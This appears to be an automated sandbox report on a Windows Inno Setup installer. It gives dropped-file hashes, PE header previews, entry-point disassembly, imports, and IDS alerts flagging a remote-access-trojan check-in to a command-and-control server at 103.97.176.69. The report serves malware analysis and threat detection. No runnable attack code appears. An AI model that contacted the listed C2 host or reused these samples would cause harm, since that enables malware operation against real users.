                                                                Preview:@...e................................................@..........P................1]...E.....Y.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):6144
                                                                Entropy (8bit):4.720366600008286
                                                                Encrypted:false
                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                 • Antivirus: Virustotal, Detection: 0%
                                                                Joe Sandbox View:
                                                                 • Filename: NkMMNoILv9.exe, Detection: malicious
                                                                 • Filename: MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip, Detection: malicious
                                                                 • Filename: MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip, Detection: malicious
                                                                 • Filename: MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip, Detection: malicious
                                                                 • Filename: ETVk1yP43q.exe, Detection: malicious
                                                                 • Filename: Setup.exe, Detection: malicious
                                                                 • Filename: qnUFsmyxMm.exe, Detection: malicious
                                                                 • Filename: Active_Setup.exe, Detection: malicious
                                                                 • Filename: setup.exe, Detection: malicious
                                                                 • Filename: Set-up.exe, Detection: malicious
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):6144
                                                                Entropy (8bit):4.720366600008286
                                                                Encrypted:false
                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                 • Antivirus: Virustotal, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\eXIHsSYhOX.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3284992
                                                                Entropy (8bit):6.5784760316942625
                                                                Encrypted:false
                                                                SSDEEP:49152:1dJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQk333uJ:rJYVM+LtVt3P/KuG2ONG9iqLRQk333K
                                                                MD5:E97363B64F37EE24CDD55CEA14D1C564
                                                                SHA1:DD82AE5EBF33348011B0437FE8107D4D72B9E2B9
                                                                SHA-256:ADE1473799360F3DF1CB0F8F20FA99E325009FB53E151236D0A2BE6F041A8C8C
                                                                SHA-512:362BDF700DDD9186E9207351F0B8879F303C8C669B4BEA2327BA549E18F7A333E11F4DC07CC2721AC18FDCDEE04A8362AE6B4CDBDC961D220E154FA6DE32182B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                 • Antivirus: Virustotal, Detection: 1%
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..Z........*.......*...@...........................2...........@......@...................P,.n.....,.j:...P0......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc.......P0......./.............@..@.............04......`3.............@..@................
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3309117
                                                                Entropy (8bit):6.5650700822104096
                                                                Encrypted:false
                                                                SSDEEP:49152:NdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQk333uj:DJYVM+LtVt3P/KuG2ONG9iqLRQk333S
                                                                MD5:5D9A0600D9A9728C4C41944EB994F931
                                                                SHA1:8DB0AD9A425FFA7CEA886A6110B364C4FA0E2E08
                                                                SHA-256:B3A92750D5A4032CE32B4B6EB2D2E5FABDB36A7F27698D491F5E4D5071509D18
                                                                SHA-512:E1B4774334B7A62506A233B996FE5029348467ADAAFBCF59652FB3A04B2580DB3D45D4547C7D3123E5CE85B5FEC747A160230D1DDE9759553E921FF2C60BDC8B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..Z........*.......*...@...........................2...........@......@...................P,.n.....,.j:...P0......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc.......P0......./.............@..@.............04......`3.............@..@................
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:InnoSetup Log File, version 0x418, 3989 bytes, 980108\37\user\376, C:\Users\user\AppData\Local\376\377\377\0
                                                                Category:dropped
                                                                Size (bytes):3989
                                                                Entropy (8bit):3.8031833444898466
                                                                Encrypted:false
                                                                SSDEEP:96:40n1f4Joffs0CVbcuJlEDA4MZAe2LdtHh/:v1PfURbP4DSmbHZ
                                                                MD5:A0A4F062D82635A4F1E407C5E16269EE
                                                                SHA1:7A2AD49A0E472BD2CA3AABFA3D0D94A518649C5F
                                                                SHA-256:27728A99DA7EAEC31C46588F8B1C5019B4BEC03FCF54973244BD089826638BD6
                                                                SHA-512:CE31168BD79AD785677AD2F2370174118CD2251E449A6F78573AD6FAB175A8B1201EDB7559C65BE17944D5D7FA2686AD72BEA67EA65E2C1BB009C51F2124F781
                                                                Malicious:false
                                                                Preview:Inno Setup Uninstall Log (b)....................................File............................................................................................................................File........................................................................................................................................!...............................................................................................................C......6....".......s........9.8.0.1.0.8......j.o.n.e.s......C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l..................;.... ..............IFPS...."........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TEXECWAIT.................!MAIN....-1..'...dll:kernel32.dll.GetCu
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3309117
                                                                Entropy (8bit):6.5650700822104096
                                                                Encrypted:false
                                                                SSDEEP:49152:NdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQk333uj:DJYVM+LtVt3P/KuG2ONG9iqLRQk333S
                                                                MD5:5D9A0600D9A9728C4C41944EB994F931
                                                                SHA1:8DB0AD9A425FFA7CEA886A6110B364C4FA0E2E08
                                                                SHA-256:B3A92750D5A4032CE32B4B6EB2D2E5FABDB36A7F27698D491F5E4D5071509D18
                                                                SHA-512:E1B4774334B7A62506A233B996FE5029348467ADAAFBCF59652FB3A04B2580DB3D45D4547C7D3123E5CE85B5FEC747A160230D1DDE9759553E921FF2C60BDC8B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..Z........*.......*...@...........................2...........@......@...................P,.n.....,.j:...P0......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc.......P0......./.............@..@.............04......`3.............@..@................
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2491219
                                                                Entropy (8bit):6.77069137489322
                                                                Encrypted:false
                                                                SSDEEP:49152:hYXn5erYk9ytmHjj4Kcz8t8yqHYZib5g1IdvkQaXXP8Z0yywVJVjyEtUy:hYXIrYrsjjn9I+ib5V0y/cEtUy
                                                                MD5:72EA5220644A482BF6EE570CB9BD996C
                                                                SHA1:C5E6C482C975CA2A3CE7CFDE9A44A2BD18E69D81
                                                                SHA-256:326F0D47F4941D7F599FEDBA56D2EFD39838BE34ACA5D9C804A01484207966E1
                                                                SHA-512:E8878BDA1C6E13D618E72B19ECE1138DCC1EAA6D4DDFACA63A779565DF5D8F088DC9CEFE498766BC8CD31E267F89CC389460DD7EEB579EF4B52AFB60C4974358
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 65%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.0g.4...'....&#...&.,...0...............@........................................&...@... .........................q.......H(..............................,......................................................$............................text....+.......,..................`..`.data........@.......0..............@....rdata..8n...P...p...2..............@..@.eh_fram............................@..@.bss....P................................edata..q............t..............@..@.idata..H(.......*...v..............@....CRT....4...........................@....tls................................@....reloc..,...........................@..B................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2491219
                                                                Entropy (8bit):6.77069137489322
                                                                Encrypted:false
                                                                SSDEEP:49152:hYXn5erYk9ytmHjj4Kcz8t8yqHYZib5g1IdvkQaXXP8Z0yywVJVjyEtUy:hYXIrYrsjjn9I+ib5V0y/cEtUy
                                                                MD5:72EA5220644A482BF6EE570CB9BD996C
                                                                SHA1:C5E6C482C975CA2A3CE7CFDE9A44A2BD18E69D81
                                                                SHA-256:326F0D47F4941D7F599FEDBA56D2EFD39838BE34ACA5D9C804A01484207966E1
                                                                SHA-512:E8878BDA1C6E13D618E72B19ECE1138DCC1EAA6D4DDFACA63A779565DF5D8F088DC9CEFE498766BC8CD31E267F89CC389460DD7EEB579EF4B52AFB60C4974358
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 65%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.0g.4...'....&#...&.,...0...............@........................................&...@... .........................q.......H(..............................,......................................................$............................text....+.......,..................`..`.data........@.......0..............@....rdata..8n...P...p...2..............@..@.eh_fram............................@..@.bss....P................................edata..q............t..............@..@.idata..H(.......*...v..............@....CRT....4...........................@....tls................................@....reloc..,...........................@..B................................................................................................................................................................................................................................
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.76702659706501
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                • Inno Setup installer (109748/4) 1.08%
                                                                • InstallShield setup (43055/19) 0.42%
                                                                • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                File name:eXIHsSYhOX.exe
                                                                File size:2'495'440 bytes
                                                                MD5:9170086e8d746e094ab4fe7444613030
                                                                SHA1:b8afef741c151864c6bffc41a82824e0f51c0b97
                                                                SHA256:982c53771e2f23b29141062b5e2a90bf1588ce4a2dbb559031e7758bd192c8eb
                                                                SHA512:4f67d8ed8f2f4ea0d498c1ed9762a106c2fce4b6dd074b0b46cf901803c50bb0e02542bc2d456132bd9654e67e713831ea0a603feec65cf7cad2ddad1c73b659
                                                                SSDEEP:49152:9wREDDMp3BgWLqWuFvO5pFdOkMgHeXDREnz+d:9wREOBFqWyO5pKkTs0+d
                                                                TLSH:EEC5E023B2CBE13EE45E0B3B05B2B25494FB6A616423BE57D6E484ACCF250501E3F657
                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                Icon Hash:2d2e3797b32b2b99
                                                                Entrypoint:0x4a83bc
                                                                Entrypoint Section:.itext
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:1
                                                                File Version Major:6
                                                                File Version Minor:1
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:1
                                                                Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                add esp, FFFFFFA4h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                xor eax, eax
                                                                mov dword ptr [ebp-3Ch], eax
                                                                mov dword ptr [ebp-40h], eax
                                                                mov dword ptr [ebp-5Ch], eax
                                                                mov dword ptr [ebp-30h], eax
                                                                mov dword ptr [ebp-38h], eax
                                                                mov dword ptr [ebp-34h], eax
                                                                mov dword ptr [ebp-2Ch], eax
                                                                mov dword ptr [ebp-28h], eax
                                                                mov dword ptr [ebp-14h], eax
                                                                mov eax, 004A2EBCh
                                                                call 00007F254CBCE185h
                                                                xor eax, eax
                                                                push ebp
                                                                push 004A8AC1h
                                                                push dword ptr fs:[eax]
                                                                mov dword ptr fs:[eax], esp
                                                                xor edx, edx
                                                                push ebp
                                                                push 004A8A7Bh
                                                                push dword ptr fs:[edx]
                                                                mov dword ptr fs:[edx], esp
                                                                mov eax, dword ptr [004B0634h]
                                                                call 00007F254CC5FB0Bh
                                                                call 00007F254CC5F65Eh
                                                                lea edx, dword ptr [ebp-14h]
                                                                xor eax, eax
                                                                call 00007F254CC5A338h
                                                                mov edx, dword ptr [ebp-14h]
                                                                mov eax, 004B41F4h
                                                                call 00007F254CBC8233h
                                                                push 00000002h
                                                                push 00000000h
                                                                push 00000001h
                                                                mov ecx, dword ptr [004B41F4h]
                                                                mov dl, 01h
                                                                mov eax, dword ptr [0049CD14h]
                                                                call 00007F254CC5B663h
                                                                mov dword ptr [004B41F8h], eax
                                                                xor edx, edx
                                                                push ebp
                                                                push 004A8A27h
                                                                push dword ptr fs:[edx]
                                                                mov dword ptr fs:[edx], esp
                                                                call 00007F254CC5FB93h
                                                                mov dword ptr [004B4200h], eax
                                                                mov eax, dword ptr [004B4200h]
                                                                cmp dword ptr [eax+0Ch], 01h
                                                                jne 00007F254CC6687Ah
                                                                mov eax, dword ptr [004B4200h]
                                                                mov edx, 00000028h
                                                                call 00007F254CC5BF58h
                                                                mov edx, dword ptr [004B4200h]
                                                                 Name | Virtual Address | Virtual Size | Is in Section
                                                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                                                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x4830 | .rsrc
                                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                                                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                 Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                 .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                 .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                 .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                 .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                 .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                 .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                 .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                 .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                 .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                 .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                 .rsrc | 0xcb000 | 0x4830 | 0x4a00 | 41595eb6b70f6cb4398e4ee1256eaddd | False | 0.30743243243243246 | data | 4.556383610024311 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                 Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                 RT_ICON | 0xcb4c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675
                                                                 RT_ICON | 0xcb5f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179
                                                                 RT_ICON | 0xcbb58 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548
                                                                 RT_ICON | 0xcbe40 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516
                                                                 RT_STRING | 0xcc6e8 | 0x3f8 | data | | | 0.3198818897637795
                                                                 RT_STRING | 0xccae0 | 0x2dc | data | | | 0.36475409836065575
                                                                 RT_STRING | 0xccdbc | 0x430 | data | | | 0.40578358208955223
                                                                 RT_STRING | 0xcd1ec | 0x44c | data | | | 0.38636363636363635
                                                                 RT_STRING | 0xcd638 | 0x2d4 | data | | | 0.39226519337016574
                                                                 RT_STRING | 0xcd90c | 0xb8 | data | | | 0.6467391304347826
                                                                 RT_STRING | 0xcd9c4 | 0x9c | data | | | 0.6410256410256411
                                                                 RT_STRING | 0xcda60 | 0x374 | data | | | 0.4230769230769231
                                                                 RT_STRING | 0xcddd4 | 0x398 | data | | | 0.3358695652173913
                                                                 RT_STRING | 0xce16c | 0x368 | data | | | 0.3795871559633027
                                                                 RT_STRING | 0xce4d4 | 0x2a4 | data | | | 0.4275147928994083
                                                                 RT_RCDATA | 0xce778 | 0x10 | data | | | 1.5
                                                                 RT_RCDATA | 0xce788 | 0x310 | data | | | 0.6173469387755102
                                                                 RT_RCDATA | 0xcea98 | 0x2c | data | | | 1.1818181818181819
                                                                 RT_GROUP_ICON | 0xceac4 | 0x3e | data | English | United States | 0.8870967741935484
                                                                 RT_VERSION | 0xceb04 | 0x584 | data | English | United States | 0.24504249291784702
                                                                 RT_MANIFEST | 0xcf088 | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                                                                 DLL | Import
                                                                 kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                 comctl32.dll | InitCommonControls
                                                                 user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                 oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                 advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
Name | Ordinal | Address
__dbk_fcall_wrapper | 2 | 0x40fc10
dbkFCallWrapperAddr | 1 | 0x4b063c
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-04T01:22:28.745998+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49736 | 103.97.176.69 | 443 | TCP
2025-01-04T01:23:33.528707+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 53307 | 103.97.176.69 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 4, 2025 01:22:28.745677948 CET | 49736 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:28.745713949 CET | 443 | 49736 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:28.745809078 CET | 49736 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:28.745997906 CET | 49736 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:28.746015072 CET | 443 | 49736 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:28.746071100 CET | 443 | 49736 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:30.347816944 CET | 53046 | 53 | 192.168.2.4 | 162.159.36.2
Jan 4, 2025 01:22:30.352650881 CET | 53 | 53046 | 162.159.36.2 | 192.168.2.4
Jan 4, 2025 01:22:30.352705002 CET | 53046 | 53 | 192.168.2.4 | 162.159.36.2
Jan 4, 2025 01:22:30.357544899 CET | 53 | 53046 | 162.159.36.2 | 192.168.2.4
Jan 4, 2025 01:22:30.798497915 CET | 53046 | 53 | 192.168.2.4 | 162.159.36.2
Jan 4, 2025 01:22:30.803453922 CET | 53 | 53046 | 162.159.36.2 | 192.168.2.4
Jan 4, 2025 01:22:30.803539038 CET | 53046 | 53 | 192.168.2.4 | 162.159.36.2
